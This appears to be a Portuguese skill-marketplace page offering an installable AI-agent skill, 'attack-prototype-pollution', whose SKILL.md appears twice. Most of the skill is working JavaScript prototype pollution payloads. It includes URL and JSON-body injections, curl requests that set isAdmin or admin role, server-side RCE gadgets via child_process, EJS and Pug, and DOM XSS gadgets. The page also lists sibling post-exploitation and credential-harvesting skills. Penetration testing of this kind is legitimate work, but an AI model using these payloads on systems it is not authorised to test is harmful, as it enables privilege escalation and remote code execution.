Execute qualquer Skill no Manus
com um clique

Execute qualquer Skill no Manus com um clique

Começar

attack-prototype-pollution

Estrelas617

Forks102

Atualizado1 de junho de 2026 às 19:16

JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation

Instalação

Instalar com Codex ou Claude Copie este prompt, cole no Codex, Claude ou outro assistente e deixe que ele revise a página da skill e instale para você.

Executar no Manus

Fonte

CyberStrikeus

CyberStrikeus/CyberStrike

Abrir repositório GitHub Ver repositórios do creator

Download

Executar no Manus

Ocupações relacionadasSOC

Baseado na classificação ocupacional SOC

Analistas de segurança da informaçãoInformática e Matemática·SOC 15-1212

SKILL.md

readonly

name	attack-prototype-pollution
description	JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation
category	web-application
version	1.0
author	cyberstrike-official
tags	["prototype-pollution","javascript","web","xss","attack"]
tech_stack	["javascript","nodejs","web"]
cwe_ids	["CWE-1321"]
chains_with	["attack-ssti"]
prerequisites	[]
severity_boost	{"attack-ssti":"Prototype pollution → SSTI gadgets = RCE"}

Prototype Pollution

Objective

Exploit JavaScript prototype pollution to modify Object.prototype, leading to XSS, privilege escalation, or RCE via gadget chains.

Testing Methodology

Phase 1: Client-Side Detection

URL-based pollution:

https://TARGET/?__proto__[polluted]=1
https://TARGET/?__proto__.polluted=1
https://TARGET/?constructor[prototype][polluted]=1
https://TARGET/#__proto__[polluted]=1

Verify in browser console:

console.log(({}).polluted) // Should print "1" if vulnerable

Phase 2: JSON Body Pollution

# Merge/patch endpoints
curl -X POST https://TARGET/api/settings \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"isAdmin": true}}'

curl -X PATCH https://TARGET/api/user/profile \
  -d '{"constructor": {"prototype": {"role": "admin"}}}'

# Nested object merge
curl -X PUT https://TARGET/api/config \
  -d '{"a": {"__proto__": {"polluted": true}}}'

Phase 3: Server-Side Detection (Node.js)

# RCE via child_process gadget
curl -X POST https://TARGET/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"shell": "/proc/self/exe", "argv0": "console.log(require(\"child_process\").execSync(\"id\").toString())", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'

# EJS template gadget
curl -X POST https://TARGET/api/settings \
  -d '{"__proto__": {"outputFunctionName": "x;process.mainModule.require(\"child_process\").execSync(\"id\");s"}}'

# Handlebars gadget
curl -X POST https://TARGET/api/settings \
  -d '{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "params": [], "path": {"type": "PathExpression", "original": "constructor"}}]}}'

Phase 4: Client-Side Gadgets

Common DOM gadgets when Object.prototype is polluted:

// innerHTML gadget
Object.prototype.innerHTML = '<img src=x onerror=alert(1)>'

// src gadget
Object.prototype.src = 'javascript:alert(1)'

// href gadget
Object.prototype.href = 'javascript:alert(1)'

// data-* attributes
Object.prototype['data-tooltip'] = '<img src=x onerror=alert(1)>'

Phase 5: Framework-Specific

Express.js / Pug:

{"__proto__": {"block": {"type": "Text", "val": "x]));process.exit()//"}}}

Lodash merge:

{"__proto__": {"polluted": true}}

What Constitutes a Finding

Finding	Severity
Server-side RCE via prototype pollution gadget	Critical (P1)
Privilege escalation (isAdmin=true)	Critical (P1)
Client-side XSS via DOM gadget	High (P2)
Prototype pollution without known gadget	Medium (P3)

Evidence Requirements

Endpoint accepting merge/deep-copy of user input
Payload sent (proto or constructor.prototype)
Proof of pollution (new property on empty object)
For RCE: command output
For XSS: JavaScript execution proof

References

Mais deste repositório

mesmo repositório

ebpf-attacks

CyberStrikeus/CyberStrike

eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux

2026-06-23617

aws-postexploit

CyberStrikeus/CyberStrike

AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3

2026-06-22617

azure-postexploit

CyberStrikeus/CyberStrike

Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation

2026-06-22617

cicd-attacks

CyberStrikeus/CyberStrike

CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab

2026-06-22617

k8s-postexploit

CyberStrikeus/CyberStrike

Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence

2026-06-22617

macos-postexploit

CyberStrikeus/CyberStrike

macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools

2026-06-22617

name	attack-prototype-pollution
description	JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation
category	web-application
version	1.0
author	cyberstrike-official
tags	["prototype-pollution","javascript","web","xss","attack"]
tech_stack	["javascript","nodejs","web"]
cwe_ids	["CWE-1321"]
chains_with	["attack-ssti"]
prerequisites	[]
severity_boost	{"attack-ssti":"Prototype pollution → SSTI gadgets = RCE"}

Prototype Pollution

Objective

Exploit JavaScript prototype pollution to modify Object.prototype, leading to XSS, privilege escalation, or RCE via gadget chains.

Testing Methodology

Phase 1: Client-Side Detection

URL-based pollution:

https://TARGET/?__proto__[polluted]=1
https://TARGET/?__proto__.polluted=1
https://TARGET/?constructor[prototype][polluted]=1
https://TARGET/#__proto__[polluted]=1

Verify in browser console:

console.log(({}).polluted) // Should print "1" if vulnerable

Phase 2: JSON Body Pollution

# Merge/patch endpoints
curl -X POST https://TARGET/api/settings \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"isAdmin": true}}'

curl -X PATCH https://TARGET/api/user/profile \
  -d '{"constructor": {"prototype": {"role": "admin"}}}'

# Nested object merge
curl -X PUT https://TARGET/api/config \
  -d '{"a": {"__proto__": {"polluted": true}}}'

Phase 3: Server-Side Detection (Node.js)

# RCE via child_process gadget
curl -X POST https://TARGET/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"shell": "/proc/self/exe", "argv0": "console.log(require(\"child_process\").execSync(\"id\").toString())", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'

# EJS template gadget
curl -X POST https://TARGET/api/settings \
  -d '{"__proto__": {"outputFunctionName": "x;process.mainModule.require(\"child_process\").execSync(\"id\");s"}}'

# Handlebars gadget
curl -X POST https://TARGET/api/settings \
  -d '{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "params": [], "path": {"type": "PathExpression", "original": "constructor"}}]}}'

Phase 4: Client-Side Gadgets

Common DOM gadgets when Object.prototype is polluted:

// innerHTML gadget
Object.prototype.innerHTML = '<img src=x onerror=alert(1)>'

// src gadget
Object.prototype.src = 'javascript:alert(1)'

// href gadget
Object.prototype.href = 'javascript:alert(1)'

// data-* attributes
Object.prototype['data-tooltip'] = '<img src=x onerror=alert(1)>'

Phase 5: Framework-Specific

Express.js / Pug:

{"__proto__": {"block": {"type": "Text", "val": "x]));process.exit()//"}}}

Lodash merge:

{"__proto__": {"polluted": true}}

What Constitutes a Finding

Finding	Severity
Server-side RCE via prototype pollution gadget	Critical (P1)
Privilege escalation (isAdmin=true)	Critical (P1)
Client-side XSS via DOM gadget	High (P2)
Prototype pollution without known gadget	Medium (P3)

Evidence Requirements

Endpoint accepting merge/deep-copy of user input
Payload sent (proto or constructor.prototype)
Proof of pollution (new property on empty object)
For RCE: command output
For XSS: JavaScript execution proof